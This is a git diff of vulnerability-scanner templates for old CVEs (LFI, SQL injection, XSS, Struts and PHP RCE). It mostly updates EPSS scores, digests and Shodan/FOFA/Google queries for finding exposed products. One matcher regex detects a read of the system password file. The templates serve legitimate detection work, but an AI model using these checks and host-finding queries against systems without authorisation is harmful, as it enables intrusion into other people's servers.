@@ -42,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022028440e6744ab15a712bbddd9e67effbb10196178d3709600c03cdd2e30ade50a02205d3555b2f4623199a271f2977587e15566212b551f0fcf96b961652ce2954fdc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml
index 29d6cfbc01..d3323122a7 100644
--- a/http/cves/2010/CVE-2010-4977.yaml
+++ b/http/cves/2010/CVE-2010-4977.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-4977
cwe-id: CWE-89
epss-score: 0.0016
- epss-percentile: 0.51628
+ epss-percentile: 0.52542
cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200897c3f3a57223199dcdda7ca0d58cb353c96217d295bf61910f84555e8de3dd022100cc179f9666339e72c243c340ca9124694c9b70e3d22b3e0459b0502fb3493085:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml
index 7504999138..d0f0ed004e 100644
--- a/http/cves/2010/CVE-2010-5028.yaml
+++ b/http/cves/2010/CVE-2010-5028.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-5028
cwe-id: CWE-89
epss-score: 0.00316
- epss-percentile: 0.67285
+ epss-percentile: 0.70272
cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210099c8a2ea34e5a300c70e613756972e76528af7ded59250030516965a6a1680710221009bbef457fcbe95c5b31680b9501a35b508099c724f7bb501a8664e2261a4b11c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml
index 55d16d1977..8ca4956da3 100644
--- a/http/cves/2010/CVE-2010-5278.yaml
+++ b/http/cves/2010/CVE-2010-5278.yaml
@@ -20,13 +20,14 @@ info:
cvss-score: 4.3
cve-id: CVE-2010-5278
cwe-id: CWE-22
- epss-score: 0.06122
- epss-percentile: 0.93381
+ epss-score: 0.06135
+ epss-percentile: 0.93535
cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: modx
product: modx_revolution
+ shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution"
tags: cve,cve2010,lfi,edb,packetstorm,modx
http:
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b69cc6b4c42025b13e1bc52d65ea1be1df0981a7add3a28408c4dc8ac8c1bb46022100dc24a3d37f2cc1e1d2ff28b81ed9bd7551744367bd64dfe547edce7f6af21976:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml
index 58bfcca251..8fb1e17633 100644
--- a/http/cves/2010/CVE-2010-5286.yaml
+++ b/http/cves/2010/CVE-2010-5286.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 10
cve-id: CVE-2010-5286
cwe-id: CWE-22
- epss-score: 0.07071
- epss-percentile: 0.93832
+ epss-score: 0.08973
+ epss-percentile: 0.94583
cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bc54ac25bae7f3d0876f30aa9fb8800f5d6c36ad89fbdc467b19abe6adce7ee102210097102e3aa4222ba9586f8537a69a955c66fa6e99b7e017c1fab3fb3287ccedc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml
index f97802ff95..4d7dc872a1 100644
--- a/http/cves/2011/CVE-2011-0049.yaml
+++ b/http/cves/2011/CVE-2011-0049.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5
cve-id: CVE-2011-0049
cwe-id: CWE-22
- epss-score: 0.96615
- epss-percentile: 0.99548
+ epss-score: 0.8814
+ epss-percentile: 0.98672
cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c46ac4d506d810715279cb2fc743fd7a9e3113cfb0b8d83b32f1481e48f48c2c0221008f18720cfdf2ca2a4860386a4b10dfdae5296fbf17f1496b8d0ec261ff5e0156:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml
index 3019f09e60..731de64f2d 100644
--- a/http/cves/2011/CVE-2011-2744.yaml
+++ b/http/cves/2011/CVE-2011-2744.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2011-2744
cwe-id: CWE-22
epss-score: 0.01541
- epss-percentile: 0.86842
+ epss-percentile: 0.87103
cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022009040bc705006390698b4760bf5d68599fa44e8cd4d06e85d1c53f6d78a66bd9022100dad78daa7c9a9543e18b8cce2f178325d4a18cf5db8fe2c2dab043196bea3e04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml
index f51495187f..5e57c93228 100644
--- a/http/cves/2011/CVE-2011-2780.yaml
+++ b/http/cves/2011/CVE-2011-2780.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2011-2780
cwe-id: CWE-22
epss-score: 0.03327
- epss-percentile: 0.91127
+ epss-percentile: 0.91341
cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db36b1f058c7168f5f8f94f9effb32d1f4c99661d18f96567059bab4e3ec0da80220306d6b230632c77476d53991becda742dc1895da400324ad45d58f94930ed72a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml
index af1291bb6b..742f2d0ceb 100644
--- a/http/cves/2011/CVE-2011-4336.yaml
+++ b/http/cves/2011/CVE-2011-4336.yaml
@@ -24,6 +24,8 @@ info:
max-request: 1
vendor: tiki
product: tikiwiki_cms\/groupware
+ shodan-query: http.html:"tiki wiki"
+ fofa-query: body="tiki wiki"
tags: cve,cve2011,seclists,xss,tikiwiki,tiki
http:
@@ -46,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml
index 369e9bebd4..09462b8d17 100644
--- a/http/cves/2011/CVE-2011-4640.yaml
+++ b/http/cves/2011/CVE-2011-4640.yaml
@@ -14,12 +14,15 @@ info:
cvss-score: 4
cve-id: CVE-2011-4640
cwe-id: CWE-22
- cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:*
+ epss-score: 0.05544
+ epss-percentile: 0.93225
+ cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
metadata:
max-request: 3
- product: spamtitan
vendor: spamtitan
+ product: webtitan
shodan-query: title:"WebTitan"
+ fofa-query: icon_hash=1090061843
tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated
http:
@@ -48,4 +51,4 @@ http:
- "regex('root:.*:0:0:', body)"
- 'status_code_3 == 200'
condition: and
-# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml
index e834c2ac52..135e8a4833 100644
--- a/http/cves/2011/CVE-2011-4804.yaml
+++ b/http/cves/2011/CVE-2011-4804.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 5
cve-id: CVE-2011-4804
cwe-id: CWE-22
- epss-score: 0.0358
- epss-percentile: 0.9073
+ epss-score: 0.44913
+ epss-percentile: 0.97396
cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220522c81df4d838763aea8850f058981a255d7d59675fdb4c02bbdb06969a0ad83022023f0320748d1a58fedaf54253d38c438cff763b3401e447409b7a5d3f520ddd5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml
index d13526871a..b1856cb394 100644
--- a/http/cves/2011/CVE-2011-4926.yaml
+++ b/http/cves/2011/CVE-2011-4926.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2011-4926
cwe-id: CWE-79
epss-score: 0.01792
- epss-percentile: 0.86796
+ epss-percentile: 0.88084
cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: adminimize
google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
-
flow: http(1) && http(2)
http:
@@ -63,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f83de4045e23f0aca5040e8aed543ca527c91a15cc2cae8b296ef058dd566b0c02202bb3500a508e65323ec114d0126118c5b4ac2949d083bdee74e4b216a01ec3d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml
index a5a828c58b..3fd885384f 100644
--- a/http/cves/2011/CVE-2011-5106.yaml
+++ b/http/cves/2011/CVE-2011-5106.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2011-5106
cwe-id: CWE-79
epss-score: 0.00434
- epss-percentile: 0.7412
+ epss-percentile: 0.74554
cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f2d8bf5d9480ea46483ac3aaaced8689aad71b8a211c5fd6d4a46d99c8e57eb5022100a79b8aec839add3b1c2180ff47f3be3e75701ceed4efe24247d9f4b77d793ed2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml
index 968b0da94d..f1a4e9b17b 100644
--- a/http/cves/2011/CVE-2011-5181.yaml
+++ b/http/cves/2011/CVE-2011-5181.yaml
@@ -13,13 +13,15 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5181
- http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71469
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2011-5181
cwe-id: CWE-79
epss-score: 0.00431
- epss-percentile: 0.71803
+ epss-percentile: 0.74451
cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -27,7 +29,6 @@ info:
product: clickdesk_live_support-live_chat_plugin
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
-
flow: http(1) && http(2)
http:
@@ -61,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022021aa179c04ce2a829ef44ba257c42d88cbde9a43eba43b3b07972b29379e757502201f591e5f16db499bbe949d543c95bbde9e5f13caac80365ebfd8d99eba1a4be6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml
index 9b02ab22c5..8ef215d300 100644
--- a/http/cves/2011/CVE-2011-5265.yaml
+++ b/http/cves/2011/CVE-2011-5265.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2011-5265
cwe-id: CWE-79
epss-score: 0.00478
- epss-percentile: 0.75288
+ epss-percentile: 0.75781
cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -28,7 +28,6 @@ info:
product: featurific-for-wordpress
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
-
flow: http(1) && http(2)
http:
@@ -62,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022072425cfa2e69f5fa975af9f2e3a07d7fb421d28e5e3a6ef9bf4fb15dcd35bb82022062abc830f020b69a5b77fdae924fcab7f7cbd217c9dc1fbbb1eebe9affc4c9b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml
index 5c7c2d6751..357b300c5a 100644
--- a/http/cves/2012/CVE-2012-0392.yaml
+++ b/http/cves/2012/CVE-2012-0392.yaml
@@ -19,13 +19,16 @@ info:
cvss-score: 6.8
cve-id: CVE-2012-0392
cwe-id: NVD-CWE-noinfo
- epss-score: 0.9496
- epss-percentile: 0.99239
+ epss-score: 0.96232
+ epss-percentile: 0.99521
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2012,apache,rce,struts,java,edb
http:
@@ -42,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e50430794e085ca63102b35b09c53e606d6053f7a358289dbb8a1dab676590b1022012914006ad07c047eaf7c2383f800f1e5dc232a9f738f5497822f03a9a28f876:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml
index 77f250d6b7..4323081301 100644
--- a/http/cves/2012/CVE-2012-0394.yaml
+++ b/http/cves/2012/CVE-2012-0394.yaml
@@ -30,6 +30,8 @@ info:
vendor: apache
product: struts
shodan-query: html:"Struts Problem Report"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2012,ognl,injection,edb,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
@@ -50,4 +52,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210099f50866d74ee7d1871049c1a234874fd8a1df1db316942d76ccb8bcb1e8f064022100aae0853112ff4ae4e6bccc269ed1dca993e734d09a3a75aaae9880afa793b6f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml
index 32cf37a74b..736305b9e2 100644
--- a/http/cves/2012/CVE-2012-0896.yaml
+++ b/http/cves/2012/CVE-2012-0896.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 5
cve-id: CVE-2012-0896
cwe-id: CWE-22
- epss-score: 0.02262
- epss-percentile: 0.88456
+ epss-score: 0.01844
+ epss-percentile: 0.883
cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206799f52e48485817e413edc30bd4f359218ec597770780417e46ddcd8b00e00602207a128007973d0e474c073c18ad434eb21153116741ec63ad256b3e003bae78cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml
index e118e248b0..57a2db83c7 100644
--- a/http/cves/2012/CVE-2012-0901.yaml
+++ b/http/cves/2012/CVE-2012-0901.yaml
@@ -14,13 +14,14 @@ info:
- http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72271
- https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-0901
cwe-id: CWE-79
- epss-score: 0.00216
- epss-percentile: 0.59612
+ epss-score: 0.00223
+ epss-percentile: 0.60514
cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -28,7 +29,6 @@ info:
product: yousaytoo
google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione
-
flow: http(1) && http(2)
http:
@@ -61,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200b96c6c74e4798235cec35053af8066d4dc6794a43e3df0b61f63109567e9189022100c8cd5a0b80864664a9fdf6bc321b718f5c0ff878c5350698f3aaa6393a671d6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml
index b2f43506a8..904bfb7219 100644
--- a/http/cves/2012/CVE-2012-0981.yaml
+++ b/http/cves/2012/CVE-2012-0981.yaml
@@ -14,13 +14,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2012-0981
- http://www.exploit-db.com/exploits/18435
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2012-0981
cwe-id: CWE-22
- epss-score: 0.02053
- epss-percentile: 0.8779
+ epss-score: 0.01277
+ epss-percentile: 0.85703
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009c6a4cabb72bde21bb132b44816b1bd64c1146b68963391fc45f78f2a847cb35022100eba1ae097bcc852f6d363e8f7d8fd65ced366197f06c5f1967617a378dd2752f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml
index 4742dede6e..286a713a33 100644
--- a/http/cves/2012/CVE-2012-0991.yaml
+++ b/http/cves/2012/CVE-2012-0991.yaml
@@ -20,13 +20,16 @@ info:
cvss-score: 3.5
cve-id: CVE-2012-0991
cwe-id: CWE-22
- epss-score: 0.81788
- epss-percentile: 0.98116
+ epss-score: 0.72743
+ epss-percentile: 0.98084
cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: openemr
product: openemr
+ fofa-query: icon_hash=1971268439
+ shodan-query: http.html:"openemr"
+ google-query: intitle:"openemr"
tags: cve,cve2012,lfi,openemr,traversal,edb
http:
@@ -43,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f513fcbb707f6870b597e07bdde31074079404931037f69b23312866186588cf022100cffc9642a1750c8be27cb6de66c1984e527cb08df8261a53c592a6909deeeb19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml
index 3b63c970e3..4c49828d04 100644
--- a/http/cves/2012/CVE-2012-0996.yaml
+++ b/http/cves/2012/CVE-2012-0996.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 5
cve-id: CVE-2012-0996
cwe-id: CWE-22
- epss-score: 0.02194
- epss-percentile: 0.89179
+ epss-score: 0.03648
+ epss-percentile: 0.91695
cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b3a84923297dce515a989c9a43b3bee4c8f3c31fdfb93e2d763a77022f59bf51022061e6935843ad22eb54f312956180a70d53cc44408b116d5002ef457535087934:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml
index b50c53d3e2..0a9a358534 100644
--- a/http/cves/2012/CVE-2012-1226.yaml
+++ b/http/cves/2012/CVE-2012-1226.yaml
@@ -19,13 +19,15 @@ info:
cvss-score: 7.5
cve-id: CVE-2012-1226
cwe-id: CWE-22
- epss-score: 0.10469
- epss-percentile: 0.94495
+ epss-score: 0.09636
+ epss-percentile: 0.94766
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dolibarr
product: dolibarr_erp\/crm
+ shodan-query: http.favicon.hash:440258421
+ fofa-query: icon_hash=440258421
tags: cve,cve2012,lfi,dolibarr,traversal,edb
http:
@@ -42,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100df385e30d328b80da4b6c9904af41285b8b741ca53a993dad0e0890bd2a2f15502203fd8dcce02a5490e27f62698143778bf2a7d93367779818b553ffa4a81cc41bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index f27d31a96a..dadef786a4 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -21,14 +21,17 @@ info:
cvss-score: 7.5
cve-id: CVE-2012-1823
cwe-id: CWE-20
- epss-score: 0.97491
- epss-percentile: 0.99972
+ epss-score: 0.97363
+ epss-percentile: 0.99899
cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: php
product: php
+ shodan-query: cpe:"cpe:2.3:a:php:php"
tags: cve,cve2012,kev,vulhub,rce,php
+variables:
+ string: "CVE-2012-1823"
http:
- raw:
@@ -37,16 +40,12 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "3d638155445bffb044eec401381ad784"
-
- - type: status
- status:
- - 200
-# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+ - '{{md5(string)}}'
